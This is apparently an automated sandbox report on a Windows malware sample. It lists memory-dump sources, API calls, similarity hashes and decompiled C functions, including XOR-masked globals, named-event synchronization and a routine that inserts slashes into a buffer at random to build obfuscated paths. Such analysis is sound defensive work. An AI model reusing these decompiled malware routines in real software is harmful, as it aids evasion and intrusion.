Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID:
API String ID: 2344289193-0
Opcode ID: f3d99417383938b71f6a2b152aef556cf33c3ad18ba2ecd81e86800343aafc8d
Instruction ID: e673ff104367f0c52f087d745ceb222eda5dea4e51937f850510f9714d4e89f8
Opcode Fuzzy Hash: f3d99417383938b71f6a2b152aef556cf33c3ad18ba2ecd81e86800343aafc8d
Instruction Fuzzy Hash: 7A41F9B590020BEFDF209FA5D984EADBBB9EF04345B64846EE501E3250D730DE419B30

Uniqueness

Uniqueness Score: -1.00%

Function 00DC8861, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00DC88B8
SysAllocString.OLEAUT32(00DCA412), ref: 00DC88FB
SysFreeString.OLEAUT32(00000000), ref: 00DC890F
SysFreeString.OLEAUT32(00000000), ref: 00DC891D

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 505229c1a624dbd7d7f0b6a998176890f4aa8ea1ea43b6f72b4a286ffdb34b4e
Instruction ID: 76502c8c756e31741a7b15cbecff0c87b68c0d2c6fd4e7d28475558fdca3ee88
Opcode Fuzzy Hash: 505229c1a624dbd7d7f0b6a998176890f4aa8ea1ea43b6f72b4a286ffdb34b4e
Instruction Fuzzy Hash: 4D311C7190020AEF8B05DF98D884DAEBBB9FF48341B14842EE50AD7210DB359A45DF76

Uniqueness

Uniqueness Score: -1.00%

Function 00DC4838, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00DC4838(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xdcd228; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0xdcd230; // 0x434a5a8
				_t3 = _t8 + 0xdce84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E00DC4200(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xdcd234, 1, 0, _t30);
					E00DC4C31(_t30);
				}
				_t12 =  *0xdcd214; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E00DC31DD() == 0) {
						_t28 =  *0xdcd104( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E00DC3267(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E00DC7E3F(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x00dc4839
0x00dc4840
0x00dc484a
0x00dc484e
0x00dc4854
0x00dc4861
0x00dc4868
0x00dc486c
0x00dc487e
0x00dc4880
0x00dc4880
0x00dc4885
0x00dc488c
0x00dc4897
0x00dc48ad
0x00dc48b1
0x00dc48b3
0x00dc48b8
0x00dc48b8
0x00dc48c5
0x00dc48c9
0x00dc48cd
0x00000000
0x00000000
0x00dc48db
0x00dc48df
0x00000000
0x00000000
0x00dc48df
0x00dc48c9
0x00000000
0x00dc48e1
0x00dc48e1
0x00dc48e1
0x00dc48e7
0x00dc48e9
0x00dc48e9
0x00dc48f3
0x00dc48f7
0x00dc4909
0x00dc4909
0x00dc490d
0x00dc4913
0x00dc4913
0x00dc4916
0x00dc4918
0x00dc491b
0x00dc491b
0x00dc4922
0x00dc4928
0x00dc4928

APIs

Part of subcall function 00DC4200: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,7742C740,00DC70CE,74666F53,00000000,?,00000000,?,?,00DC79D7), ref: 00DC4236
Part of subcall function 00DC4200: lstrcpy.KERNEL32(00000000,00000000), ref: 00DC425A
Part of subcall function 00DC4200: lstrcat.KERNEL32(00000000,00000000), ref: 00DC4262

CreateEventA.KERNEL32(00DCD234,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00DC546D,?,?,?), ref: 00DC4877

Part of subcall function 00DC4C31: HeapFree.KERNEL32(00000000,00000000,00DC5130,00000000,?,?,00000000,?,?,?,?,?,?,00DC8792,00000000), ref: 00DC4C3D

WaitForSingleObject.KERNEL32(00000000,00004E20,00DC546D,00000000,?,00000000,?,00DC546D,?,?,?,?,?,?,?,00DC38C3), ref: 00DC48D5
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00DC546D,?,?,?), ref: 00DC4903
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00DC546D,?,?,?), ref: 00DC491B

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: fa7135ab29d2d061318eecc31a4eb3de05257ea5a816e4816b8ca2bad559ee65
Instruction ID: 68caadb91ed58c5dd23cc3ddb19e763d49d0c278fbf343339bc8d9e99b311494
Opcode Fuzzy Hash: fa7135ab29d2d061318eecc31a4eb3de05257ea5a816e4816b8ca2bad559ee65
Instruction Fuzzy Hash: 3F21A1366017639BD7215BA89CA5F5BB6E9EF48711F09062CFE05DB291DB70CC018AB4

Uniqueness

Uniqueness Score: -1.00%

Function 00DC53BE, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00DC53BE(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00DC8A0C(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00DC5758(_t23);
						}
					}
					return _t38;
				}
				if(E00DC6D86(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xdcd234, 1, 0,  *0xdcd2f8);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00DC57B9(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00DCA360(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00DC30BF(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00DC4838( &_v32, _t39);
					goto L13;
				}
			}

0x00dc53be
0x00dc53cb
0x00dc53d1
0x00dc53d2
0x00dc53d3
0x00dc53d4
0x00dc53d5
0x00dc53d9
0x00dc53e5
0x00dc53e9
0x00dc5471
0x00dc5471
0x00dc5474
0x00dc5476
0x00dc547e
0x00dc5484
0x00dc5487
0x00dc5487
0x00dc5484
0x00dc5492
0x00dc5492
0x00dc53fc
0x00dc53fe
0x00dc53fe
0x00dc5415
0x00dc5419
0x00dc541c
0x00dc5427
0x00dc542e
0x00dc542e
0x00dc543a
0x00dc543b
0x00dc5449
0x00dc543d
0x00dc543d
0x00dc543e
0x00dc543f
0x00dc5440
0x00dc5441
0x00dc5442
0x00dc5442
0x00dc544e
0x00dc5453
0x00dc5455
0x00dc5457
0x00dc5457
0x00dc545e
0x00000000
0x00dc5460
0x00dc5460
0x00dc546d
0x00000000
0x00dc546d

APIs

CreateEventA.KERNEL32(00DCD234,00000001,00000000,00000040,?,?,74B5F710,00000000,74B5F730,?,?,?,?,00DC38C3,?,00000001), ref: 00DC540F
SetEvent.KERNEL32(00000000,?,?,?,?,00DC38C3,?,00000001,00DC7A05,00000002,?,?,00DC7A05), ref: 00DC541C
Sleep.KERNEL32(00000BB8,?,?,?,?,00DC38C3,?,00000001,00DC7A05,00000002,?,?,00DC7A05), ref: 00DC5427
CloseHandle.KERNEL32(00000000,?,?,?,?,00DC38C3,?,00000001,00DC7A05,00000002,?,?,00DC7A05), ref: 00DC542E

Part of subcall function 00DC57B9: WaitForSingleObject.KERNEL32(00000000,?,?,?,00DC544E,?,00DC544E,?,?,?,?,?,00DC544E,?), ref: 00DC5893
Part of subcall function 00DC57B9: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00DC544E,?,?,?,?,?,00DC38C3,?), ref: 00DC58BB

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: 8a2621ef8d7464ca8a0f045b1f046f8c8f6feecd35de2b5d852e7b169fb2cf6b
Instruction ID: 91156d8a6320c3014970a5c9986a6aee696ce4e73d6de5fec638e0adc34038e7
Opcode Fuzzy Hash: 8a2621ef8d7464ca8a0f045b1f046f8c8f6feecd35de2b5d852e7b169fb2cf6b
Instruction Fuzzy Hash: DE21B37290061BEBCB10AFE49885EAEB369EB04391B09852DFA11E7104D730EDC18BB1

Uniqueness

Uniqueness Score: -1.00%

Function 702A05B2, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 702A0B95: _free.LIBCMT ref: 702A0BA3

Part of subcall function 702A154B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,702A6B70,?,00000000,00000000), ref: 702A15ED

GetLastError.KERNEL32 ref: 702A061A
__dosmaperr.LIBCMT ref: 702A0621
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 702A0660
__dosmaperr.LIBCMT ref: 702A0667

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: a5bb2cd70a01f1fff53d4da02d85feaec8ccfcbfca70c4bb8970d8c13a3fd122
Instruction ID: fb7fd3d1092a0505656d9efe75933581e52c3722125faa7d48b5bf42c1de72ec
Opcode Fuzzy Hash: a5bb2cd70a01f1fff53d4da02d85feaec8ccfcbfca70c4bb8970d8c13a3fd122
Instruction Fuzzy Hash: 00214CB3A00206AFD7519F7689C1A5FB7AEEE447687508519FD2AD7150DF30FD308AA0

Uniqueness

Uniqueness Score: -1.00%

Function 7029D5D4, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e87e354ae26941ff2c2f7d55b02eb5145f65f8da3988ec43fec8267beec2f2d
Instruction ID: 8d23c3cffb3c9b128b9d6bd27dc6086191cf90ca2e7bf03468314513d7543438
Opcode Fuzzy Hash: 4e87e354ae26941ff2c2f7d55b02eb5145f65f8da3988ec43fec8267beec2f2d
Instruction Fuzzy Hash: 71212BB3A21211ABCB124F259D4CB0E376D9F05774F210115EE4BB7290EA30EC21F9D8

Uniqueness

Uniqueness Score: -1.00%

Function 00DC4E6B, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00DC4E6B(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00DC75C4(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00dc4e77
0x00dc4e7b
0x00dc4e7c
0x00dc4e7d
0x00dc4e7f
0x00dc4e81
0x00dc4e86
0x00dc4e89
0x00dc4f20
0x00dc4f27
0x00dc4f27
0x00dc4e92
0x00dc4e99
0x00dc4ea9
0x00dc4ea9
0x00dc4eaf
0x00dc4eb1
0x00dc4eb6
0x00dc4ebf
0x00dc4ec7
0x00dc4eca
0x00dc4ed5
0x00dc4ed9
0x00dc4edb
0x00dc4edc
0x00dc4ee5
0x00dc4ee9
0x00dc4efa
0x00dc4eeb
0x00dc4ef0
0x00dc4ef5
0x00dc4f04
0x00dc4f04
0x00dc4ed9
0x00dc4f0a
0x00dc4f10
0x00dc4f10
0x00dc4f19
0x00dc4f1e
0x00dc4f1e
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00DC4E99
lstrlenW.KERNEL32(?), ref: 00DC4ECF
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00DC4EF0
SysFreeString.OLEAUT32(?), ref: 00DC4F04

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 496b5c2fb3a56d63fb0375e9783de568d1d9ddd93da92f8552f5efa594ed1f14
Instruction ID: a63af06c2f9a7a375e37f8e36df35b4dd5778de11658ed965a8e0a7568d0c2bd
Opcode Fuzzy Hash: 496b5c2fb3a56d63fb0375e9783de568d1d9ddd93da92f8552f5efa594ed1f14
Instruction Fuzzy Hash: D7213C75A0120AEFCB11DFA8D894E9EBBB8FF48305B1441ADF906E7210E770DA41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 7029D0D8, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
_free.LIBCMT ref: 7029D13A
_free.LIBCMT ref: 7029D170
SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a8f43cb11a6e0f97ceca65ad5a14faf0ee1086b9a2c3be480f6842f721639141
Instruction ID: 8531971deecfb427f9c78cce94e951937445c2389118a4ea837d33fca1ec6e12
Opcode Fuzzy Hash: a8f43cb11a6e0f97ceca65ad5a14faf0ee1086b9a2c3be480f6842f721639141
Instruction Fuzzy Hash: 7C1170732601056EE7026A759C8DF1F366EABC1675B750228F62AB61B0EE219C31791C

Uniqueness

Uniqueness Score: -1.00%

Function 7029D22F, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000000,7029F5DF,7029C6F5,?,?,7029A4F1), ref: 7029D234
_free.LIBCMT ref: 7029D291
_free.LIBCMT ref: 7029D2C7
SetLastError.KERNEL32(00000000,702C0050,000000FF,?,00000000,7029F5DF,7029C6F5,?,?,7029A4F1), ref: 7029D2D2

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: eb55f8ba9c813a2558ccdd228d90adeb9b609659fa1b015b49d15aef38f9f04d
Instruction ID: 42e12a3ab9f0de2d7e8baf99fd1bceddf3cd24b0233d69d0d8f22c07e4603405
Opcode Fuzzy Hash: eb55f8ba9c813a2558ccdd228d90adeb9b609659fa1b015b49d15aef38f9f04d
Instruction Fuzzy Hash: 4F1170736642056EE7021B7A9C8DF1F336EABC1674B310228FA16F61A1DE61DC35B91C

Uniqueness

Uniqueness Score: -1.00%

Function 702973CE, Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,?,7029748F,00000000,?,00000001,?,?,70297506,00000001,702ADC94,702ADC8C,702ADC94), ref: 7029745E

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 894d978ba67ca95f4227c76961660d01c29f50faef51ef390b82f6cd507095c8
Instruction ID: 6d89114de02c3cf4379144afe50d67b06947b33efb761dada27de8bbde6f2da9
Opcode Fuzzy Hash: 894d978ba67ca95f4227c76961660d01c29f50faef51ef390b82f6cd507095c8
Instruction Fuzzy Hash: 1511A773A61222ABDB12DF698C4474D77F99F01760F211160EE16F7281D770ED10AAD9

Uniqueness

Uniqueness Score: -1.00%

Function 00DC71BA, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00DC71BA(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xdcd1f0, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xdcd208; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xdcd208 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00dc71c2
0x00dc71c5
0x00dc71cb
0x00dc71e3
0x00dc71e7
0x00dc71ea
0x00dc71ec
0x00dc71ef
0x00dc71f1
0x00dc71f4
0x00dc71f6
0x00dc71f6
0x00dc71f8
0x00dc7203
0x00dc7208
0x00dc7219
0x00dc7221
0x00dc7226
0x00dc7229
0x00dc722c
0x00dc722e
0x00dc7234
0x00dc7237
0x00dc7237
0x00dc7237
0x00dc7242
0x00dc7247
0x00dc7251

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00DC14A0,00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC71C5
RtlAllocateHeap.NTDLL(00000000,?), ref: 00DC71DD
memcpy.NTDLL(00000000,05119630,-00000008,?,?,?,00DC14A0,00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC7221
memcpy.NTDLL(00000001,05119630,00000001,00DC6C79,00000000,05119630), ref: 00DC7242

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: a335a0d79b6d6fb96169d32147adf44378fab978b2e1e0d2622b6a05e8bb2040
Instruction ID: 0b7ad0a2432cd7afc7ab480024282e1cf3c201d4ad1b7e5056157475240f636a
Opcode Fuzzy Hash: a335a0d79b6d6fb96169d32147adf44378fab978b2e1e0d2622b6a05e8bb2040
Instruction Fuzzy Hash: E6112972A00317AFC7108B69DC88F9EFBBEEB85350B08027AF505D7250EA709E0087B0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC752B, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00DC752B(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00DC75C4(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xdcc2bc);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xdcc2bc);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x00dc7536
0x00dc753a
0x00dc753c
0x00dc753d
0x00dc7545
0x00dc7545
0x00dc7549
0x00000000
0x00000000
0x00dc7540
0x00dc7541
0x00dc7544
0x00dc7544
0x00dc7551
0x00dc7558
0x00dc755c
0x00dc7564
0x00dc756a
0x00dc756c
0x00dc7571
0x00dc7575
0x00dc7577
0x00dc757a
0x00dc7581
0x00dc7581
0x00dc758b
0x00dc758e
0x00dc7591
0x00dc7591
0x00dc759d
0x00dc759d
0x00dc75aa

APIs

StrChrA.SHLWAPI(?,00000020,00000000,0511962C,?,?,?,00DC5B5B,0511962C,?,?,00DC79CC), ref: 00DC7545
StrTrimA.SHLWAPI(?,00DCC2BC,00000002,?,?,?,00DC5B5B,0511962C,?,?,00DC79CC), ref: 00DC7564
StrChrA.SHLWAPI(?,00000020,?,?,?,00DC5B5B,0511962C,?,?,00DC79CC,?,?,?,?,?,00DC87DD), ref: 00DC756F
StrTrimA.SHLWAPI(00000001,00DCC2BC,?,?,?,00DC5B5B,0511962C,?,?,00DC79CC,?,?,?,?,?,00DC87DD), ref: 00DC7581

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: bb8047149b6d66f6ba1bd8e94e501a5716ba93e33480b31911906cfb2f1c5cb9
Instruction ID: 240422e442d95911dc86e8820d9e5c8dccadc5f4f08aadcf730f00da64ffd6fe
Opcode Fuzzy Hash: bb8047149b6d66f6ba1bd8e94e501a5716ba93e33480b31911906cfb2f1c5cb9
Instruction Fuzzy Hash: 9601D8716193135FC2219F698C48F2BBE98FB85BA0F25051DF985C7381EB60CC019AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00DC4200, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00DC4200(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E00DC5B70(_t8, _t1);
				_t16 = E00DC75C4(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E00DC39B5(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00DC75C4(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00DC4C31(_t16);
				}
				return _t18;
			}

0x00dc420b
0x00dc420c
0x00dc420f
0x00dc4211
0x00dc421c
0x00dc4220
0x00dc4225
0x00dc4229
0x00dc4231
0x00dc4236
0x00dc423e
0x00dc423e
0x00dc4247
0x00dc424b
0x00dc4251
0x00dc4254
0x00dc425a
0x00dc425a
0x00dc4262
0x00dc4262
0x00dc4269
0x00dc4269
0x00dc4274

APIs

Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0

Part of subcall function 00DC39B5: wsprintfA.USER32 ref: 00DC3A11

lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,7742C740,00DC70CE,74666F53,00000000,?,00000000,?,?,00DC79D7), ref: 00DC4236
lstrcpy.KERNEL32(00000000,00000000), ref: 00DC425A
lstrcat.KERNEL32(00000000,00000000), ref: 00DC4262

Strings

Soft, xrefs: 00DC420C, 00DC4225

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: b441adf60438f78d54a89e70627252c821c9d9fd8169a9853c0503bee45a7945
Instruction ID: b49b3d4f39966b9ebcccf4423790f0fe3fc434b75530fb1e8a5a5199ed72257a
Opcode Fuzzy Hash: b441adf60438f78d54a89e70627252c821c9d9fd8169a9853c0503bee45a7945
Instruction Fuzzy Hash: 1701A23210021BA7CB126BA49C95FEE7A79EF85355F044029F90997101DB74C945DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00DC5B10, Relevance: 6.0, APIs: 4, Instructions: 29
